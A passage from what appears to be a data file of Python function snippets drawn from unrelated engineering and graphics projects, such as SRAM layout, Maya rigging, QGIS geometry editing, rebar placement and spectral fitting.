height=self.height)\n\n # adds the BR on metal 2\n offset = vector(self.bitcell.get_pin(self.bitcell_br).cx(),0) - vector(0.5 * self.m2_width,0)\n self.add_layout_pin(text=\"br\",\n layer=\"metal2\",\n offset=offset,\n width=drc['minwidth_metal2'],\n height=self.height)", "def __init__(self, workplane, measures):\n\n cq.Workplane.bracket = utilities.bracket\n cq.Workplane.transformedWorkplane = utilities.transformedWorkplane\n cq.Workplane.bolt = utilities.bolt\n cq.Workplane.cutEachAdaptive = utilities.cutEachAdaptive\n\n self.model = workplane\n self.debug = False\n self.measures = measures\n m = self.measures\n\n # The bracket lengths are measured at the outside, but the construction actually uses a \n # central cuboid block with two attached brackets. Adapting the measures accordingly.\n m.center_block = Measures(\n # Naming is as seen from the horizontal leg.\n width = max(m.horizontal_leg.width, m.vertical_leg.width),\n depth = m.vertical_leg.height,\n height = m.horizontal_leg.height\n )\n m.horizontal_leg.depth -= m.center_block.depth\n m.vertical_leg.depth -= m.center_block.height\n\n # Create hole specs which combine the other hole measures in the format expected by bolthole().\n m.horizontal_leg.hole_specs = [\n {\n \"diameter\": m.horizontal_leg.hole_diameters[i] if isinstance(m.horizontal_leg.hole_diameters, list) else m.horizontal_leg.hole_diameters,\n \"clamp_length\": m.horizontal_leg.clamp_lengths[i] if isinstance(m.horizontal_leg.clamp_lengths, list) else m.horizontal_leg.clamp_lengths, \n \"nuthole_size\": m.horizontal_leg.nuthole_sizes[i] if isinstance(m.horizontal_leg.nuthole_sizes, list) else m.horizontal_leg.nuthole_sizes, \n \"nuthole_depth\": 1.1 * m.vertical_leg.depth # Just choose something large enough for cutting. \n }\n for i in range(m.horizontal_leg.hole_count)\n ]\n m.vertical_leg.hole_specs = [\n {\n \"diameter\": m.vertical_leg.hole_diameters[i] if isinstance(m.vertical_leg.hole_diameters, list) else m.vertical_leg.hole_diameters,\n \"clamp_length\": m.vertical_leg.clamp_lengths[i] if isinstance(m.vertical_leg.clamp_lengths, list) else m.vertical_leg.clamp_lengths, \n \"nuthole_size\": m.vertical_leg.nuthole_sizes[i] if isinstance(m.vertical_leg.nuthole_sizes, list) else m.vertical_leg.nuthole_sizes, \n \"nuthole_depth\": 1.1 * m.horizontal_leg.depth # Just choose something large enough for cutting. \n }\n for i in range(m.vertical_leg.hole_count)\n ]\n\n # TODO: Initialize missing measures with defaults.\n\n self.build()", "def blockScale_bake(self,sizeMethod = 'axisSize',force=False,):\n try:\n _str_func = 'bake_blockScale'\n log.debug(cgmGEN.logString_start(_str_func))\n str_self = self.mNode\n \n if self.p_parent:\n return log.error(cgmGEN.logString_msg(_str_func, \"Can't bake parented blocks, please unparent\"))\n \n _blockScale = self.blockScale\n \n if MATH.is_float_equivalent(_blockScale,1):\n log.debug(cgmGEN.logString_msg(_str_func, 'Already 1.0'))\n return True\n \n if self.hasAttr('baseSize'):\n _baseSize = True\n for a in 'xyz':\n if ATTR.is_connected(str_self,'baseSize'+a.capitalize()):\n _baseSize=False\n break\n if _baseSize:\n log.info(cgmGEN.logString_msg(_str_func, 'baseSize buffer. Not connected'))\n self.baseSize = baseSize_get(self)\n \n _factor = 1.0/_blockScale\n \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True)\n md_dat = {}\n \n log.debug(cgmGEN.logString_sub(_str_func, 'Gather Dat'))\n #First Loop gateher\n for i,mCtrl in enumerate(ml_ctrls):\n _str = mCtrl.p_nameShort\n _d = {'str':_str}\n \n if not ATTR.is_locked(_str,'translate'):\n _d['pos']=mCtrl.p_position\n \n _d['lossyScale'] = TRANS.scaleLossy_get(_str)\n _d['worldScale'] = mc.xform(_str, q=True, scale = True, worldSpace = True, absolute = True)\n _d['factorScale'] = [v*_factor for v in _d['worldScale']]\n \n _d['noParent'] = False\n if ATTR.is_locked(_str,'translate'):\n _d['noParent'] = True\n \n \n for a in ['sx','sy','sz']:\n if not ATTR.is_locked(_str,a):\n v = ATTR.get(_str,a)\n #if not MATH.is_float_equivalent(1.0,v):\n _d[a] = v * _blockScale\n if not _d.get('axisSize'):\n _d['axisSize'] = DIST.get_axisSize(_str)\n if not _d.get('bbSize'):\n _d['bbSize'] = TRANS.bbSize_get(_str)\n \n md_dat[i] = _d\n \n \n #pprint.pprint(md_dat)\n #return\n log.debug(cgmGEN.logString_msg(_str_func, 'Setting intiial'))\n ATTR.set(self.mNode,'blockScale',1.0)\n \"\"\"\n blockDat_save(self)\n blockDat_load(self,redefine=True) \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True) \n \"\"\"\n \n for ii in range(3):#3 loop to account for parentage\n log.debug(cgmGEN.logString_sub(_str_func, 'Push: {0}'.format(ii)))\n\n for i,mCtrl in enumerate(ml_ctrls):\n _d = md_dat[i]\n log.debug(cgmGEN.logString_msg(_str_func, \"{0} | {1}\".format(_d['str'],_d)))\n _pos = _d.get('pos')\n _noParent = _d['noParent']\n \n if _pos:mCtrl.p_position = _pos\n \n \n _worldScale = _d.get('worldScale')\n if _worldScale and _noParent is not True:\n mParent = mCtrl.p_parent\n if mParent:\n mCtrl.p_parent = False\n \n #mc.xform(mCtrl.mNode, scale = _worldScale, objectSpace = True, absolute = True)\n mc.xform(mCtrl.mNode, scale = _worldScale, worldSpace = True, absolute = True)\n \n if mParent:mCtrl.p_parent = mParent\n else:\n if not ATTR.is_locked(mCtrl.mNode,'scale'):\n \"\"\"\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\"\"\"\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n #reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n \"\"\"\n if ii == 0:\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\"\"\" \n #Fix the root shape\n #if not ATTR.is_connected(self.mNode,'baseSize'):\n #log.info(cgmGEN.logString_sub(_str_func, 'Base size buffer'))\n \n rootShape_update(self)\n #pprint.pprint(vars())\n return True \n except Exception,err:\n cgmGEN.cgmExceptCB(Exception,err)", "def blockScale_bake(self,sizeMethod = 'axisSize',force=False,):\n try:\n _str_func = 'bake_blockScale'\n log.debug(cgmGEN.logString_start(_str_func))\n str_self = self.mNode\n \n if self.p_parent:\n return log.error(cgmGEN.logString_msg(_str_func, \"Can't bake parented blocks, please unparent\"))\n \n _blockScale = self.blockScale\n \n if MATH.is_float_equivalent(_blockScale,1):\n log.debug(cgmGEN.logString_msg(_str_func, 'Already 1.0'))\n return True\n \n if self.hasAttr('baseSize'):\n _baseSize = True\n for a in 'xyz':\n if ATTR.is_connected(str_self,'baseSize'+a.capitalize()):\n _baseSize=False\n break\n if _baseSize:\n log.info(cgmGEN.logString_msg(_str_func, 'baseSize buffer. Not connected'))\n self.baseSize = baseSize_get(self)\n \n _factor = 1.0/_blockScale\n \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True)\n md_dat = {}\n \n log.debug(cgmGEN.logString_sub(_str_func, 'Gather Dat'))\n #First Loop gateher\n for i,mCtrl in enumerate(ml_ctrls):\n _str = mCtrl.p_nameShort\n _d = {'str':_str}\n \n if not ATTR.is_locked(_str,'translate'):\n _d['pos']=mCtrl.p_position\n \n _d['lossyScale'] = TRANS.scaleLossy_get(_str)\n _d['worldScale'] = mc.xform(_str, q=True, scale = True, worldSpace = True, absolute = True)\n _d['factorScale'] = [v*_factor for v in _d['worldScale']]\n \n _d['noParent'] = False\n if ATTR.is_locked(_str,'translate'):\n _d['noParent'] = True\n \n \n for a in ['sx','sy','sz']:\n if not ATTR.is_locked(_str,a):\n v = ATTR.get(_str,a)\n #if not MATH.is_float_equivalent(1.0,v):\n _d[a] = v * _blockScale\n if not _d.get('axisSize'):\n _d['axisSize'] = DIST.get_axisSize(_str)\n if not _d.get('bbSize'):\n _d['bbSize'] = TRANS.bbSize_get(_str)\n \n md_dat[i] = _d\n \n \n #pprint.pprint(md_dat)\n #return\n log.debug(cgmGEN.logString_msg(_str_func, 'Setting intiial'))\n ATTR.set(self.mNode,'blockScale',1.0)\n \"\"\"\n blockDat_save(self)\n blockDat_load(self,redefine=True) \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True) \n \"\"\"\n \n for ii in range(3):#3 loop to account for parentage\n log.debug(cgmGEN.logString_sub(_str_func, 'Push: {0}'.format(ii)))\n\n for i,mCtrl in enumerate(ml_ctrls):\n _d = md_dat[i]\n log.debug(cgmGEN.logString_msg(_str_func, \"{0} | {1}\".format(_d['str'],_d)))\n _pos = _d.get('pos')\n _noParent = _d['noParent']\n \n if _pos:mCtrl.p_position = _pos\n \n \n _worldScale = _d.get('worldScale')\n if _worldScale and _noParent is not True:\n mParent = mCtrl.p_parent\n if mParent:\n mCtrl.p_parent = False\n \n #mc.xform(mCtrl.mNode, scale = _worldScale, objectSpace = True, absolute = True)\n mc.xform(mCtrl.mNode, scale = _worldScale, worldSpace = True, absolute = True)\n \n if mParent:mCtrl.p_parent = mParent\n else:\n if not ATTR.is_locked(mCtrl.mNode,'scale'):\n \"\"\"\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\"\"\"\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n \"\"\"\n if ii == 0:\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\"\"\" \n #Fix the root shape\n #if not ATTR.is_connected(self.mNode,'baseSize'):\n #log.info(cgmGEN.logString_sub(_str_func, 'Base size buffer'))\n \n rootShape_update(self)\n #pprint.pprint(vars())\n return True \n except Exception,err:\n cgmGEN.cgmExceptCB(Exception,err)", "def gripStretchQgsGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n wkbType = geom.wkbType()\n if wkbType == QGis.WKBPoint or wkbType == QGis.WKBPoint25D:\n pt = stretchPoint(geom.asPoint(), ptListToStretch, offSetX, offSetY)\n if pt is not None:\n return QgsGeometry.fromPoint(pt)\n \n if wkbType == QGis.WKBMultiPoint:\n stretchedGeom = QgsGeometry(geom)\n points = stretchedGeom.asMultiPoint() # vettore di punti\n atSubGeom = 0\n for pt in points:\n subGeom = QgsGeometry.fromPoint(pt)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n\n if wkbType == QGis.WKBLineString:\n return gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n \n if wkbType == QGis.WKBMultiLineString:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asMultiPolyline() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBPolygon:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asPolygon() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBMultiPolygon:\n stretchedGeom = QgsGeometry(geom)\n polygons = geom.asMultiPolygon() # vettore di poligoni\n atSubGeom = 0\n for polygon in polygons:\n subGeom = QgsGeometry.fromPolygon(polygon)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n return None", "def gripStretchQgsLinearObjectList(linearObjectList, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n linearObjectListToStretch = qad_utils.QadLinearObjectList(linearObjectList)\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n\n return linearObjectListToStretch", "def place_rebar_long_flex(as_req, width, cover, link_d, d, spacing):\r\n \"\"\"as_req - required area of steel\"\"\"\r\n \"\"\"width - beam width; cover - beam side cover; link_d; shear link diameter in millimeters\"\"\"\r\n \"\"\"d - diameter of bar; spacing - minimum spacing of bars\"\"\"\r\n\r\n layer = [2] # initialize vector that stores number of bottom bars (minimum 2)\r\n as_ = layer[-1] * d ** 2 * np.pi / 4 # determine current area of reinforcement\r\n\r\n while as_ < as_req: # while amount of reinforcement of the beam is less than required\r\n layer[-1] = layer[-1] + 1 # add one bar\r\n # evaluate distance between bars\r\n d_axis_b = (int(width) - 2 * cover - 2 * link_d - d) / (int(layer[-1]) - 1) # distance between bar axis\r\n d_bars_b = d_axis_b - d # distance between bars\r\n\r\n if d_bars_b < spacing: # in case bars are spaced less than spacing variable\r\n layer[-1] = layer[-1] - 1 # go back to previous number of bars\r\n layer.append(2) # add another layer of bars with minimum of 2 bars\r\n\r\n as_ = sum(layer) * d ** 2 * np.pi / 4 # update current area of reinforcement\r\n\r\n rebar = []\r\n\r\n for i in range(len(layer)):\r\n layers_list = [layer[i], d]\r\n rebar.append(layers_list)\r\n\r\n return rebar", "def build_rig(self):\n\n # create rig part top nodes\n self.create_part_master()\n\n # Get all the relevant part info\n prefix = self.prefix\n options = self.options\n anim_ctrls = self.anim_ctrls\n bind_jnts = self.bind_joints\n hooks = self.hooks\n ctrl_grps = self.ctrl_grps\n jnt_grps = self.jnt_grps\n\n mirror = self.mirror_value\n\n parent = options.get('parent')\n squash_stretch = options.get('squashStretch')\n aimDownBone = options.get('aimDownBone')\n single_joint = options.get('singleJoint')\n number_joints = options.get('numberJoints')\n pickWalk_parent = options.get('pickWalkParent')\n\n # Create ctrls\n zeros, ctrls, offsets, last_nodes = [], [], [], []\n\n for i, ctrl_name in enumerate(anim_ctrls):\n zero, ctrl, offCtrls, last_node = self.anim_ctrl(ctrl_name)\n zeros.append(zero)\n ctrls.append(ctrl)\n offsets.append(offCtrls)\n last_nodes.append(last_node)\n\n #Setup pickwaliking attributes for the fingers\n i = 0\n ctrls.reverse()\n for ctrl in ctrls:\n\n if i+1 < len(ctrls):\n\n pickWalk.attribute_tag(ctrls[i],ctrls[i+1])\n else:\n pickWalk.attribute_tag(ctrls[i],pickWalk_parent)\n break\n\n i+=1\n ctrls.reverse()\n\n if len(ctrls) > 1:\n for i in range(1, len(ctrls), 1):\n mc.parent(zeros[i], last_nodes[i-1])\n\n # constraint jnts\n if len(bind_jnts) > 2:\n\n # point and aim/orient contraint all joints down the chain based on the\n for i in range(len(last_nodes)-1):\n mc.pointConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_pc')\n if not squash_stretch:\n mc.scaleConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_sc')\n\n if i < len(last_nodes)-1:\n print aimDownBone\n if aimDownBone:\n mc.aimConstraint(last_nodes[i+1],\n bind_jnts[i],\n aim=[mirror,0,0],\n u=[0,1,0],\n wu=[0,1,0],\n wut='objectRotation',\n wuo=last_nodes[i],\n mo=1, n=bind_jnts[i]+'_ac')\n if aimDownBone == False:\n mc.orientConstraint(last_nodes[i],bind_jnts[i],n=bind_jnts[i]+'_oc')\n\n #parent constrain the last joint ot the last ctrl\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_prc')\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n\n # if not squash_stretch:\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_sc')\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_sc')\n\n elif single_joint or number_joints == 1:\n mc.parentConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_prc')\n mc.scaleConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_sc')\n\n else:\n if squash_stretch:\n spline.preserve_volume(ctrls, bind_jnts[:-1], ctrls[0], attrs=['sy','sz'])\n\n mc.parentConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n mc.scaleConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_sc')\n\n mc.parent(zeros[0], ctrl_grps[0])\n mc.parent(bind_jnts, jnt_grps[0])\n\n if not single_joint and number_joints == 1:\n mc.parent(bind_jnts[-1], bind_jnts[0])\n\n #utils.create_cfx_curves(self.bind_joints, self.prefix+'_'+self.part_type)\n\n if len(ctrls) > 1:\n spaces.tag(ctrls, arg='partParent:'+self.options.get('parent'))\n else:\n spaces.tag(ctrls)\n\n self.finalize_part()", "def bndy_plasma(self):\n self.ne[0], self.ne[-1] = 1e11, 1e11\n self.ni[0], self.ni[-1] = 1e11, 1e11\n self.nn[0], self.nn[-1] = 1e11, 1e11\n self.Te[0], self.Te[-1] = 0.1, 0.1\n self.Ti[0], self.Ti[-1] = 0.01, 0.01\n # self.coll_em[0], self.coll_em[-1] = 1e5, 1e5\n # self.coll_im[0], self.coll_im[-1] = 1e5, 1e5", "def prepare_blockages(self, pin_name):\n debug.info(3,\"Preparing blockages.\")\n \n # Start fresh. Not the best for run-time, but simpler.\n self.clear_blockages()\n # This adds the initial blockges of the design\n #print(\"BLOCKING:\",self.blocked_grids)\n self.set_blockages(self.blocked_grids,True)\n\n # Block all of the supply rails (some will be unblocked if they're a target)\n self.set_supply_rail_blocked(True)\n \n # Block all of the pin components (some will be unblocked if they're a source/target)\n # Also block the previous routes\n for name in self.pin_groups:\n blockage_grids = {y for x in self.pin_groups[name] for y in x.grids}\n self.set_blockages(blockage_grids,True)\n blockage_grids = {y for x in self.pin_groups[name] for y in x.blockages}\n self.set_blockages(blockage_grids,True)\n\n # FIXME: These duplicate a bit of work\n # These are the paths that have already been routed.\n self.set_blockages(self.path_blockages)\n\n # Don't mark the other components as targets since we want to route\n # directly to a rail, but unblock all the source components so we can\n # route over them\n blockage_grids = {y for x in self.pin_groups[pin_name] for y in x.grids}\n self.set_blockages(blockage_grids,False)", "def setup_layout_constants(self):\n # determines the spacing between the edge and nmos (rail to active\n # metal or poly_to_poly spacing)\n half_gate_to_gate = 0.5 * (drc[\"poly_to_poly\"] - drc[\"minwidth_metal1\"])\n edge_to_nmos = max(drc[\"metal1_to_metal1\"] - self.nmos.active_contact_positions[0].y,\n half_gate_to_gate - self.nmos.poly_positions[0].y)\n\n # determine the position of the first transistor from the left\n self.nmos_position1 = vector(0,\n 0.5 * drc[\"minwidth_metal1\"] + edge_to_nmos)\n offset = self.nmos_position1 + vector(0,self.nmos.height)\n\n x = vector(self.nmos.active_width - self.nmos.active_contact.width, 0)\n self.nmos_position2 = x + self.nmos_position1.scale(0,1)\n\n # determines the spacing between the edge and pmos\n edge_to_pmos = max(drc[\"metal1_to_metal1\"] - self.pmos.active_contact_positions[0].y,\n half_gate_to_gate - self.pmos.poly_positions[0].y)\n self.pmos_position1 = vector(0,\n self.height - 0.5 * drc[\"minwidth_metal1\"]\n - edge_to_pmos - self.pmos.height)\n self.pmos_position2 = self.pmos_position1 + vector(self.pmos.width,0)\n\n self.well_width = max(self.pmos_position2.x + self.pmos.active_position.x\n + self.pmos.active_width\n + drc[\"active_to_body_active\"] + self.nwell_contact.width \n + drc[\"well_enclosure_active\"],\n self.nmos_position2.x + self.nmos.active_position.x \n + self.nmos.active_width \n + drc[\"active_to_body_active\"] + drc[\"well_enclosure_active\"])\n self.width = self.well_width", "def setup_fitting_init_pars(inparam, night, band, masterbeam, order):\n\n # Determine whether IGRINS mounting was loose or\n # the night of interest is in question\n if (int(night) < 20180401) or (int(night) > 20190531):\n IPpars = inparam.ips_tightmount_pars[band][masterbeam][order]\n else:\n IPpars = inparam.ips_loosemount_pars[band][masterbeam][order]\n\n # start at bucket loc = 1250 +- 100, width = 250 +- 100,\n # depth = 100 +- 5000 but floor at 0\n centerloc = 1250 if band == 'H' else 1180\n\n # Initialize parameter array for optimization as well as half-range values\n # for each parameter during the various steps of the optimization.\n # Many of the parameters initialized here will be changed throughout the\n # code before optimization and in between optimization steps.\n\n parA0 = np.array([\n 0.0, # 0: The shift of the stellar template (km/s)\n 0.0, # 1: The scale factor for the stellar template\n 0.0, # 2: The shift of the telluric template (km/s)\n 1.0, # 3: The scale factor for the telluric template\n 0.0, # 4: vsini (km/s)\n IPpars[2], # 5: The instrumental resolution (FWHM) in pixels\n 0.0, # 6: Wavelength 0-pt\n 0.0, # 7: Wavelength linear component\n 0.0, # 8: Wavelength quadratic component\n 0.0, # 9: Wavelength cubic component\n 1.0, #10: Continuum zero point\n 0.0, #11: Continuum linear component\n 0.0, #12: Continuum quadratic component\n IPpars[1], #13: Instrumental resolution linear component\n IPpars[0], #14: Instrumental resolution quadratic component\n centerloc, #15: Blaze dip center location\n 330, #16: Blaze dip full width\n 0.05, #17: Blaze dip depth\n 90, #18: Secondary blaze dip full width\n 0.05, #19: Blaze dip depth\n 0.0, #20: Continuum cubic component\n 0.0, #21: Continuum quartic component\n 0.0, #22: Continuum quintic component\n 0.0, #23: Continuum hexic component\n 0.0, #24: secondary par\n 0.0, #25: secondary par\n 0.0, #26: secondary par\n 0.0 #27: secondary par\n ])\n\n return parA0", "def prepare(info_dict):\n\n logger.info(\"\\n-=# Chain optimization cycle 0 #=- \\n\")\n params, M, engine, result, _ = get_basic_info(info_dict)\n\n logger.info(\"Spring Force: %.2f kcal/mol/Ang^2 \\n\" % params.nebk)\n\n tmpdir = tempfile.mkdtemp()\n\n # Getting the initial chain.\n chain = ElasticBand(M, engine=engine, tmpdir=tmpdir, params=params, plain=params.plain)\n\n trust = params.trust\n chain.ComputeChain(result=result)\n chain.ComputeGuessHessian(blank=isinstance(engine, Blank))\n chain.PrintStatus()\n\n avgg_print, maxg_print = print_forces(chain, params.avgg, params.maxg)\n logger.info(\"-= Chain Properties =- \\n\")\n logger.info(\n \"@\\n%13s %13s %13s %13s %11s %13s %13s \\n\"\n % (\"GAvg(eV/Ang)\", \"GMax(eV/Ang)\", \"Length(Ang)\", \"DeltaE(kcal)\", \"RMSD(Ang)\", \"TrustRad(Ang)\", \"Step Quality\")\n )\n logger.info(\n \"@%13s %13s %13s \\n\"\n % (\n \" %s \" % avgg_print,\n \" %s \" % maxg_print,\n \"% 8.4f \" % sum(chain.calc_spacings()),\n )\n )\n\n GW = chain.get_global_grad(\"total\", \"working\")\n GP = chain.get_global_grad(\"total\", \"plain\")\n HW = chain.guess_hessian_working.copy()\n HP = chain.guess_hessian_plain.copy()\n dy, expect, expectG, ForceRebuild = chain.CalcInternalStep(trust, HW, HP)\n new_chain = chain.TakeStep(dy)\n respaced = new_chain.delete_insert(1.5)\n newcoords = chaintocoords(new_chain)\n attrs_new = check_attr(new_chain)\n attrs_prev = check_attr(chain)\n\n temp = {\"Ys\": [chain.get_internal_all().tolist()], \"GWs\": [GW.tolist()], \"GPs\": [GP.tolist()], \"attrs_new\": attrs_new,\n \"attrs_prev\": attrs_prev, \"trust\": trust, \"expect\": expect, \"expectG\": expectG.tolist(), \"respaced\": respaced,\n \"trustprint\": \"=\", \"frocerebuild\": False,\"lastforce\": 0, \"coord_ang_prev\": chaintocoords(chain, True),\n \"result_prev\": result, \"geometry\": []}\n info_dict.update(temp)\n return newcoords, info_dict", "def determine_doubler_plate(self, connection_type, steel, left_beam, right_beam, bottom_column, top_column):\r\n if connection_type == 'top exterior':\r\n # Connection has one left beam and one bottom column\r\n h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n db = left_beam.section['d']\r\n tf = left_beam.section['tf']\r\n self.shear_force['Vc'] = (self.moment['Mf1']+0) / (h_bot/2+0)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+0)/(db-tf) - self.shear_force['Vc']\r\n elif connection_type == 'typical exterior':\r\n # Connection has one left beam and two columns\r\n h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n h_top = top_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n db = left_beam.section['d']\r\n tf = left_beam.section['tf']\r\n self.shear_force['Vc'] = (self.moment['Mf1']+0) / (h_bot/2+h_top/2)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+0)/(db-tf) - self.shear_force['Vc']\r\n elif connection_type == 'top interior':\r\n # Connection has two beams and one bottom column\r\n h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n # Actually left and right beams have the identical sizes\r\n db = (left_beam.section['d'] + right_beam.section['d'])/2\r\n tf = (left_beam.section['tf'] + right_beam.section['tf'])/2\r\n self.shear_force['Vc'] = (self.moment['Mf1']+self.moment['Mf2']) / (h_bot/2)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+self.moment['Mf2'])/(db-tf) - self.shear_force['Vc']\r\n elif connection_type == 'typical interior':\r\n # Connection has two beams and two columns\r\n h_bot = bottom_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n h_top = top_column.unbraced_length['x']*12.0 # Be cautious: convert the unit from ft to inch\r\n db = (left_beam.section['d'] + right_beam.section['d']) / 2\r\n tf = (left_beam.section['tf'] + right_beam.section['tf']) / 2\r\n self.shear_force['Vc'] = (self.moment['Mf1']+self.moment['Mf2']) / (h_bot/2+h_top/2)\r\n self.shear_force['Ru'] = (self.moment['Mf1']+self.moment['Mf2'])/(db-tf) - self.shear_force['Vc']\r\n else:\r\n sys.stderr.write('Error: wrong type of connection specified!\\nNo such keyword for connection 